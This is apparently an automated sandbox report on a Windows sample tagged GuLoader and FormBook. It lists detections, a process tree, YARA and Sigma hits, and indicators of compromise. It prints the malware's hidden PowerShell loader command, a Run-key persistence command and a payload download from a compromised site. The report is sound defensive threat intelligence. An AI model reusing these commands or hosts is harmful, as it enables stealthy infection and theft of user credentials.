Edit tour

Windows Analysis Report
SwiftCopy_23052024.exe

Overview

General Information

Sample name:	SwiftCopy_23052024.exe
Analysis ID:	1446510
MD5:	f8a9b82d69416512778ad72015181036
SHA1:	60013bbc382ad1722fc5be5f72188c57e7a4928d
SHA256:	dabc79a064aa9838ad06d11311ff4c72913d9a7e7c1016cc9e12dcc46d474b8a
Tags:	exesigned
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected GuLoader

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Obfuscated command line found

Powershell drops PE file

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Suspicious powershell command line found

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

SwiftCopy_23052024.exe (PID: 1464 cmdline: "C:\Users\user\Desktop\SwiftCopy_23052024.exe" MD5: F8A9B82D69416512778AD72015181036)

powershell.exe (PID: 4324 cmdline: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6508 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Tabsgivende.exe (PID: 2020 cmdline: "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe" MD5: F8A9B82D69416512778AD72015181036)

cmd.exe (PID: 7608 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6244 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

GjMghjdydYRuCpMLokUCwhVfwlj.exe (PID: 5944 cmdline: "C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

Magnify.exe (PID: 6836 cmdline: "C:\Windows\SysWOW64\Magnify.exe" MD5: 4E5E8AB7FDC1933F43031B9CC13E7198)

wlanext.exe (PID: 1156 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)

GjMghjdydYRuCpMLokUCwhVfwlj.exe (PID: 4460 cmdline: "C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x137cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x137cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x137cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x137cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6acc9:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x54418:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x500688:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4e9dd7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x500688:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4e9dd7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2198487086.0000000009E4D000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6244, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)", ProcessId: 6244, ProcessName: reg.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4324, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 6508, ProcessName: cmd.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe, ParentProcessId: 2020, ParentProcessName: Tabsgivende.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)", ProcessId: 7608, ProcessName: cmd.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4324, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe", ProcessId: 2020, ProcessName: Tabsgivende.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", CommandLine: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_23052024.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_23052024.exe, ParentProcessId: 1464, ParentProcessName: SwiftCopy_23052024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", ProcessId: 4324, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: innovativebuildingsolutions.in	Virustotal: Detection: 13%	Perma Link
Source: www.innovativebuildingsolutions.in	Virustotal: Detection: 10%	Perma Link
Source: https://www.innovativebuildingsolutions.in/	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Virustotal: Detection: 27%			Perma Link

Multi AV Scanner detection for submitted file

Source: SwiftCopy_23052024.exe	ReversingLabs: Detection: 26%
Source: SwiftCopy_23052024.exe	Virustotal: Detection: 27%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SwiftCopy_23052024.exe

Joe Sandbox ML: detected

Source: SwiftCopy_23052024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 103.21.58.98:443 -> 192.168.2.7:49706 version: TLS 1.2

Source: SwiftCopy_23052024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: .Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Tabsgivende.exe, Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ore.pdbL source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb%B source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Code function: 0_2_004062F0 FindFirstFileA,FindClose,	0_2_004062F0
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004057B5

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.innovativebuildingsolutions.inCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: www.innovativebuildingsolutions.in

Source: powershell.exe, 00000002.00000002.2194788863.0000000006D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft3m
Source: SwiftCopy_23052024.exe, SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.innovativebuildingsolutions.in/
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2374837467.0000000021E40000.00000004.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2361654109.000000000664A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 103.21.58.98:443 -> 192.168.2.7:49706 version: TLS 1.2

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

Code function: 0_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405252

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
